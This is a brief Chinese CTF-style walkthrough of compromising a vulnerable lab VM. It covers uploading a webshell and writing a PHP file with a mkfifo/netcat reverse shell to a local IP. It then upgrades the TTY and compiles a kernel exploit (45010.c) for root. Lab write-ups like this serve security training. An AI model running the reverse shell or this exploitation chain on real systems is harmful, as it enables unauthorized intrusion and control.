首先配置一下虚拟机,因为 ova 格式用 VM 导入的话,是不显示 ip 的,具体配置网上都有,这里就不说了
配置成功后,在本机上使用 arp-scan -l 就可以看到靶机 ip (用来验证是否配置成功)
端口扫描
开放了 80 端口,所以直接访问看看,点点点,就发现可疑接口
写个一句话木马传上去,蚁剑连
再 WordPress 下面发现配置文件
在 /var/www/html 下有个.backup 文件
然后尝试登录系统,但是并没有发现什么有用的东西,先写个反弹 shell 吧
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.248.129 443 >/tmp/f");?>
kali 本地监听 443 端口,浏览器访问刚才创建的反弹 shell 的文件 2.php
出现下图界面即为反弹成功
升级 tty shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
查看一下内核版本
在 kali 里找一下有没有该版本的漏洞信息,果然发现
使用命令,把 .c
文件下下来,然后直接在本地 gcc 45010.c -o exp
编译完成以后我们通过 ftp 服务上传到靶机中
再回到靶机那边,给 exp 权限,最后提权成功
进入 root 目录下,发现第二个 flag